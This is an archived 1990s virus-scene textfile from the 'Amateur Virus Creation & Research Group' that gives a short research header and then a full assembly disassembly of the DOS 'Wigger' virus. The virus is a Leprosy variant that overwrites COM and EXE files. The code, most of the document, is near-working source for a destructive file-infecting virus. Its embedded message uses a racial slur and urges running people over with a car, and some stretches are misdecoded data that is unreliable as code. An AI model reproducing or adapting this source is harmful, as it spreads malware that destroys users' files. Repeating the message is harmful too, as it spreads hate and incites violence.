💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.008 captured on 2023-11-04 at 15:59:47.

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       Distributed By Amateur Virus Creation & Research Group (AVCR)

                       Research of the wigger virus
                                       Security Threat

Name: Wigger
Type Of Code:  Not Informed
VSUM Information:  No info found on WIGGER.COM
Antivirus Detection: 
ThunderByte Anti Virus (TBAV) reported wigger.com as leprosy

Frisk Software's F-Protect (F-PROT) reported wigger.com as leprosy.b

McAfee Softwares Anti Virus (SCAN.EXE) reported wigger.com as leprosy.b

MicroSoft Anti Virus (MSAV.EXE) reported wigger.com as "the leprosy virus"
Execution Results: Infects all COM and EXE files.
Cleaning Recommendations: Impossible. Infected programs must be deleted
Researcher's Notes:  As infecting either reads "program to big to fit in
memory" or "You have noticed wiggers seem to have taken over the high school
scene."  "If you see one, please hit him with your car".  It is a variant of
leprosy.  Also "News flash","Plague","viper","busted","leprosy-c",
"leprosy-d", "scribble","seneca","surfer","xarbras",and "angel of death"
                      Disassembly of the wigger Virus 
                PAGE    60,132

;?????????? CODE_SEG_1  ????????????????????????????????????????????????????????

CODE_SEG_1      segment para public
                assume  CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1

                org     100h

;?              ENTRY POINT

;?              PROCEDURE proc_start

proc_start      proc    far
start:          ; N-Ref=0
                call    near ptr proc_2         
                jmp     loc_5                   
proc_start      endp

var1_106        db      0

;?              PROCEDURE proc_1

proc_1          proc    near
                mov     BX,Word Ptr var1_2a3    ; [6556:02A3] = 0
                push    BX                      
                call    near ptr proc_2         
                pop     BX                      
                mov     CX,29Ah                 
                mov     DX,offset var1_100      
                mov     AH,40h                  ; '@'
                int     21h                     ; DOS func ( ah ) = 40h
                                                ; Write to file or device
                                                ;BX-file handle
                                                ; CX-bytes to read  DS:DX-DTA
                                                ;if CF=0 AX-bytes read
                                                ; else AX-ret code
                call    near ptr proc_2         
proc_1          endp

;?              PROCEDURE proc_2

proc_2          proc    near
                mov     BX,offset var1_131      
loc_1:          ; N-Ref=1
                mov     AH,Byte Ptr [BX]        
                xor     AH,Byte Ptr var1_106    ; [6556:0106] = 8B00h
                mov     Byte Ptr [BX],AH        
                inc     BX                      
                cmp     BX,3CBh                 
                jle     loc_1                   ; Jump if not greater ( <= )
proc_2          endp

var1_131        db      '*.EXE'
                db      0
var1_137        db      '*.COM'
                db      0
var1_13d        db      2Eh, 2Eh, 0
var1_140        db      0Dh, 0Ah
                db      'Program too big to fit in memory

var1_163        db      0Dh, 0Ah, 9, 0C9h
                db      66 dup (0CDh)
                db      0BBh, 20h, 24h
var1_1ac        db      0Dh, 0Ah, 9, 0BAh
                db      20h, 20h, 57h
var1_1b3        db      'e Have Noticed That Wiggers Seem To Have'
loc_2:          ; N-Ref=0
                and     Byte Ptr [SI+61h],DL    

var1_1de        db      'ken Over The High   '
                db      0BAh, 20h, 24h
var1_1f5        db      0Dh, 0Ah, 9, 0BAh
var1_1f9        db      '   School Scen'
var1_207        db      'e. If You See One, Please Hit Him With Your Car!  '
                db      '  '
                db      0BAh, 20h, 24h
var1_23e        db      0Dh, 0Ah
loc_3:          ; N-Ref=0
                or      AX,CX                   
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                int     0CDh                    
                mov     SP,2420h                
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
                add     Byte Ptr [BX+SI],AL     
loc_5:          ; N-Ref=4
                mov     AH,2Ch                  ; ','
                int     21h                     ; DOS func ( ah ) = 2Ch
                                                ; Get time
                                                ;CL-min CH-hours DH-seconds
                                                ; DL-1/100 of secs
                cmp     Byte Ptr var1_106,0     ; [6556:0106] = 8B00h
                je      loc_6                   ; Jump if equal ( = )
                cmp     DH,0Fh                  
                jnle    loc_7                   ; Jump if greater ( > )
loc_6:          ; N-Ref=1
                cmp     DL,0                    
                je      loc_5                   ; Jump if equal ( = )
                mov     Byte Ptr var1_106,DL    ; [6556:0106] = 8B00h
loc_7:          ; N-Ref=1
                mov     Byte Ptr var1_29b,0     ; [6556:029B] = 0
                mov     Byte Ptr var1_29c,4     ; [6556:029C] = 0
                mov     Byte Ptr var1_2a5,0     ; [6556:02A5] = 0B400h
loc_8:          ; N-Ref=1
                mov     CX,27h                  
                mov     DX,offset var1_131      
                mov     AH,4Eh                  ; 'N'
                int     21h                     ; DOS func ( ah ) = 4Eh
                                                ; FIND FIRST: Start file search
                                                ;CX-attr to search on
                                                ; DS:DX-ASCIIZ string
                                                ;if CF=1 AX-ret code
                cmp     AX,12h                  
                je      loc_9                   ; Jump if equal ( = )
                call    near ptr proc_3         
loc_9:          ; N-Ref=1
                mov     CX,27h                  
                mov     DX,offset var1_137      
                mov     AH,4Eh                  ; 'N'
                int     21h                     ; DOS func ( ah ) = 4Eh
                                                ; FIND FIRST: Start file search
                                                ;CX-attr to search on
                                                ; DS:DX-ASCIIZ string
                                                ;if CF=1 AX-ret code
                cmp     AX,12h                  
                je      loc_10                  ; Jump if equal ( = )
                call    near ptr proc_3         
loc_10:         ; N-Ref=1
                mov     DX,offset var1_13d      
                mov     AH,3Bh                  ; ';'
                int     21h                     ; DOS func ( ah ) = 3Bh
                                                ; CHDIR: Change directory
                                                ;DS:DX-ASCIIZ string
                                                ;AX-ret code if CF set
                dec     Byte Ptr var1_29c       ; [6556:029C] = 0
                jne     loc_8                   ; Jump if not equal ( != )
                jmp     loc_15                  

;?              PROCEDURE proc_3

proc_3          proc    near
loc_11:         ; N-Ref=1
                mov     BX,80h                  
                mov     AX,Word Ptr [BX+15h]    
                mov     Word Ptr var1_2a1,AX    ; [6556:02A1] = 0
                mov     AX,Word Ptr [BX+16h]    
                mov     Word Ptr var1_29d,AX    ; [6556:029D] = 0
                mov     AX,Word Ptr [BX+18h]    
                mov     Word Ptr var1_29f,AX    ; [6556:029F] = 0
                mov     DX,9Eh                  
                mov     CX,0                    
                mov     AL,1                    
                mov     AH,43h                  ; 'C'
                int     21h                     ; DOS func ( ah ) = 43h
                                                ; CHMOD:Get/set file attributes
                                                ;AL-(0/1)get/set code CX-attrib
                                                ; DS:DX-ASCIIZ string
                                                ;if CF=1 AX-ret code
                                                ; CX-attrib if set used
                mov     AL,2                    
                mov     AH,3Dh                  ; '='
                int     21h                     ; DOS func ( ah ) = 3Dh
                                                ; Open file
                                                ;CX-acsess code
                                                ;  DS:DX-ASCIIZ string
                                                ;AX-file handle
                                                ; if CF=1 AX-error code
                mov     Word Ptr var1_2a3,AX    ; [6556:02A3] = 0
                mov     BX,AX                   
                mov     CX,14h                  
                mov     DX,offset var1_287      
                mov     AH,3Fh                  ; '?'
                int     21h                     ; DOS func ( ah ) = 3Fh
                                                ; Read from file or device
                                                ;BX-file handle
                                                ; CX-bytes to read  DS:DX-DTA
                                                ;if CF=0 AX-bytes read
                                                ; else AX-ret code
                mov     BX,offset var1_287      
                mov     AH,Byte Ptr var1_106    ; [6556:0106] = 8B00h
                mov     Byte Ptr [BX+6],AH      
                mov     SI,offset var1_100      
                mov     DI,offset var1_287      
                mov     AX,DS                   
                mov     ES,AX                   
                cld                             ; Clear direction flag
                repz    cmpsb                   ; Repeat if ZF = 1, CX > 0
                                                ; Cmp byte at DS:SI to ES:DI
                jne     loc_14                  ; Jump if not equal ( != )
                call    near ptr proc_4         
                inc     Byte Ptr var1_29b       ; [6556:029B] = 0
loc_12:         ; N-Ref=1
                mov     AH,4Fh                  ; 'O'
                int     21h                     ; DOS func ( ah ) = 4Fh
                                                ; FIND NEXT: Continue file search
                                                ;DS:DX-info from FIND FIRST
                                                ; or prev FIND NEXT
                                                ;if CF=1 AX-ret code
                cmp     AX,12h                  
                je      loc_13                  ; Jump if equal ( = )
                jmp     short loc_11            
loc_13:         ; N-Ref=1
loc_14:         ; N-Ref=1
                mov     BX,Word Ptr var1_2a3    ; [6556:02A3] = 0
                mov     AH,3Eh                  ; '>'
                int     21h                     ; DOS func ( ah ) = 3Eh
                                                ; Close file handle
                                                ;BX-file handle
                                                ;if CF=1 AX-ret code
                mov     AH,3Dh                  ; '='
                mov     DX,9Eh                  
                mov     AL,2                    
                int     21h                     ; DOS func ( ah ) = 3Dh
                                                ; Open file
                                                ;CX-acsess code
                                                ;  DS:DX-ASCIIZ string
                                                ;AX-file handle
                                                ; if CF=1 AX-error code
                mov     Word Ptr var1_2a3,AX    ; [6556:02A3] = 0
                call    near ptr proc_1         
                call    near ptr proc_4         
                inc     Byte Ptr var1_2a5       ; [6556:02A5] = 0B400h
                dec     Byte Ptr var1_29c       ; [6556:029C] = 0
                je      loc_15                  ; Jump if equal ( = )
                jmp     short loc_12            
proc_3          endp

                db      0C3h

;?              PROCEDURE proc_4

proc_4          proc    near
                mov     BX,Word Ptr var1_2a3    ; [6556:02A3] = 0
                mov     CX,Word Ptr var1_29d    ; [6556:029D] = 0
                mov     DX,Word Ptr var1_29f    ; [6556:029F] = 0
                mov     AL,1                    
                mov     AH,57h                  ; 'W'
                int     21h                     ; DOS func ( ah ) = 57h
                                                ; Get/set file date and time
                                                ;AL-(0/1)get/set flag BX-handle
                                                ; CX/DX-time/date,if AL=1
                                                ;if CF=1 AX-extended err code
                                                ; CX/DX-time/date if AL=0
                mov     BX,Word Ptr var1_2a3    ; [6556:02A3] = 0
                mov     AH,3Eh                  ; '>'
                int     21h                     ; DOS func ( ah ) = 3Eh
                                                ; Close file handle
                                                ;BX-file handle
                                                ;if CF=1 AX-ret code
                mov     CX,Word Ptr var1_2a1    ; [6556:02A1] = 0
                mov     AL,1                    
                mov     DX,9Eh                  
                mov     AH,43h                  ; 'C'
                int     21h                     ; DOS func ( ah ) = 43h
                                                ; CHMOD:Get/set file attributes
                                                ;AL-(0/1)get/set code CX-attrib
                                                ; DS:DX-ASCIIZ string
                                                ;if CF=1 AX-ret code
                                                ; CX-attrib if set used
proc_4          endp

loc_15:         ; N-Ref=2
                cmp     Byte Ptr var1_29b,6     ; [6556:029B] = 0
                jl      loc_16                  ; Jump if less ( < )
                cmp     Byte Ptr var1_2a5,0     ; [6556:02A5] = 0B400h
                jnle    loc_16                  ; Jump if greater ( > )
                mov     AH,9                    
                mov     DX,offset var1_163      
                int     21h                     ; DOS func ( ah ) = 9
                                                ; Display string
                                                ;DS:DX-output string
                mov     DX,offset var1_1ac      
                int     21h                     ; DOS func ( ah ) = 9
                                                ; Display string
                                                ;DS:DX-output string
                mov     DX,offset var1_1f5      
                int     21h                     ; DOS func ( ah ) = 9
                                                ; Display string
                                                ;DS:DX-output string
                mov     DX,offset var1_23e      
                int     21h                     ; DOS func ( ah ) = 9
                                                ; Display string
                                                ;DS:DX-output string
                jmp     short loc_17            

                db      90h
loc_16:         ; N-Ref=2
                mov     AH,9                    
                mov     DX,offset var1_140      
                int     21h                     ; DOS func ( ah ) = 9
                                                ; Display string
                                                ;DS:DX-output string
loc_17:         ; N-Ref=1
                mov     AH,4Ch                  ; 'L'
                int     21h                     ; DOS func ( ah ) = 4Ch
                                                ; Terminate process
                                                ;AL-ret code

                dw      7 dup (9090h)
                db      90h
CODE_SEG_1      ends

                end     start
        This seems to be similar to the leprosy B code except for encryption
and strings displayed.    